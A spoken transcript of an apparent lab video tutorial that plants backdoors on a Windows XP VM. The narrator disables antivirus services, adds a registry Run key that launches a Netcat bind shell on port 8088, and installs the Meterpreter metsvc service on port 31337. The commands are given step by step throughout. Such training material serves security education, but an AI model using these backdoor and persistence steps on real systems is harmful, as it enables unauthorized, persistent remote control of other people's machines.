Alright, so in this video we're going to talk about a Netcat backdoor. I'm going to show you my XP machine. I believe is still booting. Actually, it's shutting down. I'm rebooting it right now. Let's pull up another terminal, and I'm going to show you kind of a cool little location that we have in here that's in Kali by default, and that's cd/usr/share/windows. Just use the tab key, Windows-binary. And let's take a look at that. There's even a backdoors folder. There's a keylogger that's in here. Here's our NC. That's our Netcat binary that we're going to be uploading. There's a VNC viewer, or our admin for remote admin. I mean, a ton of stuff in here. And these are all things that we can upload to the Windows system. Of course, if the antivirus is enabled, it's going to flag these because these are all pretty well known in most antivirus dictionaries. But that is a cool little spot where we do have some other tools available for us. So I'm going to go ahead and just exit out of that terminal, and let's check on my XP machine, and it's already in here, so I'm going to go ahead and log in. XP1, alright. Once that's logged in, what I've done is my antivirus services should be shut down. I disabled those services because I wanted to successfully try and give you a demonstration of the Netcat backdoor, and if I would have left them on, it's definitely going to flag it. So you can't just turn off the Malwarebytes. In this case, we can't just turn it off because we're going to be rebooting the system. And if the system reboots and the services automatically start, then we're not going to be successful. So make sure that you go into your services if you need to and disable the Malwarebytes service and the Malwarebytes scheduler. And I'm just going to wait here. The anti-exploit I'm not worried about. That's running, but that really hasn't given us any issues. I'm just looking to see if the main service starts up, and if it is, I need to turn that off. And I think we're going to be okay. So let's just get this set up. It's going to take a minute to set up. I'm going to re-exploit my XP machine, so whatever method you want to use, go ahead and use that. Alright, so I've got a Meterpreter session opened, and now we basically need to upload. We need to upload that nc.exe that's already available to us and throw it in like System32, or I'm going to recommend System32 because we're going to be running also the command prompt out of the System32 folder, so let's throw it in there. So what we're going to do is just do our upload command, and if we remember where it was in usr/share Windows binaries and nc.exe, and we're going to upload that to c:\whack Windows and System32. I need to remember to add the double backslashes, and at the very end add a couple there. Alright, so it uploaded it, and so now there's a couple things that we can do. I can actually show you how to check to see if there's any values contained in a particular spot in a registry. So like maybe if we wanted to look and see what was in, well, I'll show you the what we're going to do, and then you'll see what I'm talking about. So to check registry values, we're going to do a reg-enum key, which is cool because we can do this with inside of Meterpreter. We don't actually have to drop into a shell or anything. And we're going to do a -k. Now here's HKLM. In Meterpreter, it's a little bit different. Now in Windows, we would have to do HKey _ local _ machine and that so forth. But we can actually just do an HKLM. And we also need to add our double whacks or double backslashes. And it's going to be software, Microsoft, oops, I spelled that wrong, soft, Windows, current version, and run. So as long as you have that all done right, -k, HKLM, whack software, do another couple backslashes, Microsoft, and then Windows, current version, run, we just hit enter, and this will show us anything that is loaded in there. And we can already see, I can pretty much already identify here that there are a couple backdoors that already exist onto this system, which is probably like in my XP machine, I have my anti-exploit pop up every now and then. It's most probably one of these backdoors that I've put in there, or who knows, I would need to take a look at it. But anyways, I could already, if I just wanted to look at the system, I could say, wow, it probably looks like someone else has already been here. There may be somebody else that has already compromised the system. Just something to look at, just more information for you guys to have that you may want to use down the road. So what we're going to do is we want to go ahead and add our Netcat in here. So to set a registry value, we're going to do a reg set val. We're going to do a -k. And basically everything that we just did. HKLM. We're going to do, if you want to go up, you can actually just copy up there. We're going to do software, but make sure we put that double backslashes in there. Microsoft. I keep misspelling this. There we go. Windows. Current version. We're going to do a run. And then here's where it gets a little bit different. We're going to do a -v, and this is to set the value, and we're going to name it Netcat. We can name it whatever we want, but obviously I want to be able to identify it later, and it doesn't look as suspicious as giving it a bunch of random characters like that. So let's go ahead and do a -d. This is going to be the data line, which we're going to look at this after we're done. When it actually sets inside the registry, there's a data line in there, and it tells it what to execute. So what we're going to do is a single quote c:/Windows/system32/nc.exe. And the other thing that we're going to add is a -LDP. This is going to create a port that's listening, a listening port. And so after this, we need to specify the port number that we want to do it on. And let's go ahead and just do 8088. 8088. I don't know if I have anything already running on 8888, so I don't want to cause any conflict. So 8088 is what I'm going to do. And then we're going to do a -e for execute and cmd.exe. So it's going to launch this binary with command prompt. I'm going to do a single quote to end. If everything was done correctly, let's hit enter. Successful, set Netcat. So awesome. We didn't get any errors or anything like that. So now let's query it to make sure that everything looks good. We can do a reg query val, the -k just like everything else, and then the same thing. We need to now do the same location. So HKLM software Microsoft. There I go again with the misspell. There we go. Windows current version run, and the value Netcat is the value name. So let's hit enter, and we can see that it's in key. There's the key there, the name Netcat, and there's that data line I was telling you about, CMD, Windows, and so forth, LDP, all that stuff. So awesome. It set everything correctly. If you had any issues with this, just go back, watch the video. Maybe you just mistyped something or something like that. So okay, so now for this to actually work, we need to reboot the machine. Now obviously we can do that from interpreter, and I'm going to just do reboot and make sure, yep, there we go, it's rebooting. So this is why I say if we were to just disable like the malware bytes, well, when it goes to reboot, if it starts the services again, then our backdoor isn't going to work, and that's why you actually want to disable it from the services like we did in previous videos. So we'll just wait a couple minutes for this thing to start back up, and we'll go from there. Alright, we're booted back into XP. Just log in here. XPVM1. And so now in our Kali machine, while that's booting up, we're actually going to open up another terminal. And here's where we get outside of Metasploit just for a bit. Now, at boot, before we log in, the system, the services should already start up. But the reason that I want to log in is so that I can see if the antivirus turns on, and if it does turn on, I can see if it's blocking our processes and that sort of thing. So you shouldn't need to log in, but I'm doing this just to see what's starting up. So I'm going to go back to Kali, and what we would want to do to wrap this up is we're going to do an NC, and that's obviously for Netcat. And a -V is for verbose, and then we're going to add an N. Now, we don't need to do a -V and then a -N. We can actually just put them together, -V and then an N. And then the N specifies that we're going to put in an IP address. So that IP address is our target, 192.168.1.6. And then what port did we throw it on? We threw it on 8088. Let me go back to my XP. Yes, I'm not worried about that there. And my Malwarebytes has not started, just the anti-exploit, but the antivirus did not. So we should be good. Let's go ahead and give it a shot. No route to host. Interesting. Usually if it doesn't work, like if an antivirus catches it, it will tell you that it cannot connect or that the host is out of reach. So it's very interesting that that is not starting. Let me go ahead and pull up a command prompt. Netcat is running. So it should work. I'm just going to go to the System32 folder here. And we'll find nc.exe. Okay, there's our nc.exe. Let's just go ahead and double click that. And we can see that it opens up the command prompt, which is what it's supposed to do. Now, the user obviously doesn't see that. Let me do this again. Oh, it's a 106. Oh, I got my IP address wrong. 192.168. I bet you were like probably screaming at me through the through your monitor there. Anyways, look how fast it worked. C: documents and settings researcher. Oh, can't believe I did that. But anyways, it happens. It didn't make any sense, and I was like, well, I don't know what's going on there. But anyways, we did not need to open up Netcat. It's already working. It is running, and there's our shell. We can do cd, do a dir, do all that stuff, and we've got a shell. So let me exit that out. And that closes our session, or our shell anyways. And my interpreter session died because I rebooted the machine. So what I'm going to actually do is I'm going to do an exploit. We're going to re-exploit this, and the last thing that I'm going to show you is to install the Meterpreter service onto the other machine. And obviously this will flag the antivirus. So run Metsvc. And this is going to automatically choose a random port. We don't specify the port. It's going to throw some files in on the other system, and let's see if it works. Okay. It creates a temporary installation directory. Obviously, that looks very fishy, but that's what it did. We can see that it uploaded a DLL, the Metasploit server, and the service. And then it installs the service, and it starts the service. So, service Metsvc successfully installed. Awesome. Now we need to remember the port. Now this is kind of funny because if you can read nerd stuff like I can, this is elite. So we are on the elite port right there, 31337. So let's do a exit. And now we can run a handler. Now for this handler, it's going to be a little bit different. We're going to actually do a bind TCP. So we're going to do a use exploit multi handler. That's good. And then the payload is going to be different. So set payload Windows Metsvc. I'm just going to hit tab so that I got to wait for it to catch up. There we go. And then an underscore. And then I can hit tab twice. There's a bind TCP. There's also reverse TCP. because we're on the network, and because we when we get into pivoting and that sort of thing, I like to use the bind TCP just in this example. But you can go ahead and give both a shot and see which one works for you. But let's just do a bind underscore TCP. Now for this one, show options. When we bind it, all we need to do is set the R host, and then I need to set the L port because the L port is not 4444. So I'm going to set L to 31337. That's what it created it on. Do a set R host, and the remote host is 192.168.1.106. I can go ahead and hit run, or you can hit exploit. Starting the payload handler, and there we go. Meterpreter session 5 opened, and now I may have a bunch of other like payloads that are already calling back, but I can verify that this what we just did was the actual initiation, because I can see that the port is 31337, so I know that our service worked properly. I can exit this out. We can run it again, and we can see, there you go, session 6. So without antivirus, it runs awesome. I mean, we can get our session fairly quick. So that's just another example. I know it's kind of a lengthy video there, guys, and I messed up sort of on the IP address, but it has. You just got to sit there and try and figure it out. But anyways, I'm glad that you stayed with it. Hopefully you did. I will see you guys in the next video.